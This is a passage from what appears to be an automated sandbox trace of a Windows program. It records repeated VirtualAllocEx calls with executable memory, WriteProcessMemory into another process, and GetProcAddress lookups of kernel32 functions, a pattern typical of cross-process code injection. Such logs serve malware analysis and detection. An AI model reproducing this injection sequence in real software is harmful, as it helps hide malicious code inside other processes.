lpBaseAddress=0x20000, lpBuffer=0x32b3d3d4*, nSize=0xa, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d3d4*, lpNumberOfBytesWritten=0xcd978*=0xa) returned 1 [0184.250] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.251] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84c30 [0184.251] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.251] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84c30*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84c30*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.251] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.252] ResetEvent (hEvent=0x794) returned 1 [0184.252] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.252] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.252] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.252] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84c30 | out: hHeap=0x2150000) returned 1 [0184.252] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.252] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.253] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.253] lstrlenA (lpString="GetProcessHeap") returned 14 [0184.253] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.253] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d3e0*, nSize=0xf, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d3e0*, lpNumberOfBytesWritten=0xcd978*=0xf) returned 1 [0184.253] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.253] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84db0 [0184.253] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.254] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84db0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84db0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.255] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.255] ResetEvent (hEvent=0x794) returned 1 [0184.255] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.256] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.256] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.256] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84db0 | out: hHeap=0x2150000) returned 1 [0184.256] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.256] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.256] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.256] lstrlenA (lpString="lstrlenA") returned 8 [0184.256] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.257] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d3f2*, nSize=0x9, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d3f2*, lpNumberOfBytesWritten=0xcd978*=0x9) returned 1 [0184.257] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.257] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e847b0 [0184.257] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.257] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e847b0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e847b0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.258] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.258] ResetEvent (hEvent=0x794) returned 1 [0184.258] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.258] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.305] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.306] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e847b0 | out: hHeap=0x2150000) returned 1 [0184.306] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.306] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.306] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.306] lstrlenA (lpString="lstrcpyA") returned 8 [0184.306] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.306] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d3fe*, nSize=0x9, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d3fe*, lpNumberOfBytesWritten=0xcd978*=0x9) returned 1 [0184.307] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.307] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84bd0 [0184.307] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.307] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84bd0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84bd0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.308] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.308] ResetEvent (hEvent=0x794) returned 1 [0184.308] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.309] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.309] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.309] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84bd0 | out: hHeap=0x2150000) returned 1 [0184.309] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.309] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.309] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.309] lstrlenA (lpString="EnterCriticalSection") returned 20 [0184.309] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.310] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d40a*, nSize=0x15, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d40a*, lpNumberOfBytesWritten=0xcd978*=0x15) returned 1 [0184.310] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.310] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e851d0 [0184.310] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.310] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e851d0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e851d0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.311] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.311] ResetEvent (hEvent=0x794) returned 1 [0184.311] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.312] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.312] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.312] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e851d0 | out: hHeap=0x2150000) returned 1 [0184.312] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.312] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.312] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.312] lstrlenA (lpString="LeaveCriticalSection") returned 20 [0184.312] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.312] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d422*, nSize=0x15, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d422*, lpNumberOfBytesWritten=0xcd978*=0x15) returned 1 [0184.313] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.313] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84b70 [0184.313] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.313] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84b70*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84b70*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.314] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.314] ResetEvent (hEvent=0x794) returned 1 [0184.314] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.314] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.314] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.315] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84b70 | out: hHeap=0x2150000) returned 1 [0184.315] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.315] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.315] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.315] lstrlenA (lpString="InitializeCriticalSection") returned 25 [0184.315] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.315] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d43a*, nSize=0x1a, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d43a*, lpNumberOfBytesWritten=0xcd978*=0x1a) returned 1 [0184.316] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.316] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84db0 [0184.316] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.316] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84db0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84db0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.316] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.317] ResetEvent (hEvent=0x794) returned 1 [0184.317] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.317] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.317] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.317] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84db0 | out: hHeap=0x2150000) returned 1 [0184.317] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.318] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.318] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.318] lstrlenA (lpString="LocalFree") returned 9 [0184.318] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.318] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d46e*, nSize=0xa, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d46e*, lpNumberOfBytesWritten=0xcd978*=0xa) returned 1 [0184.318] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.319] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84ae0 [0184.319] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.319] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84ae0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84ae0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.319] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.320] ResetEvent (hEvent=0x794) returned 1 [0184.320] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.320] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.320] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.320] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84ae0 | out: hHeap=0x2150000) returned 1 [0184.320] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.321] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.321] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.321] lstrlenA (lpString="QueryFullProcessImageNameA") returned 26 [0184.321] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x1b, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.321] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d47a*, nSize=0x1b, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d47a*, lpNumberOfBytesWritten=0xcd978*=0x1b) returned 1 [0184.322] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.322] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84db0 [0184.322] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.322] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84db0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84db0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.322] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.323] ResetEvent (hEvent=0x794) returned 1 [0184.323] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.323] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.323] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.323] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84db0 | out: hHeap=0x2150000) returned 1 [0184.323] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.323] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.324] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.324] lstrlenA (lpString="GetFileSize") returned 11 [0184.324] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.324] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d498*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d498*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0184.324] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.324] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84930 [0184.324] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.324] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84930*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84930*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.325] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.325] ResetEvent (hEvent=0x794) returned 1 [0184.325] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.326] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.326] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.326] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84930 | out: hHeap=0x2150000) returned 1 [0184.326] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.326] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.331] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.331] lstrlenA (lpString="lstrlenW") returned 8 [0184.331] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.331] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d4a6*, nSize=0x9, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d4a6*, lpNumberOfBytesWritten=0xcd978*=0x9) returned 1 [0184.331] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.332] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84930 [0184.332] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.332] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84930*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84930*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.332] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.334] ResetEvent (hEvent=0x794) returned 1 [0184.334] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.334] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.334] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.334] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84930 | out: hHeap=0x2150000) returned 1 [0184.334] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.334] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.334] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.335] lstrlenA (lpString="CloseHandle") returned 11 [0184.335] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.335] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d96c*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d96c*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0184.335] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.335] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85290 [0184.335] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.335] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e85290*, 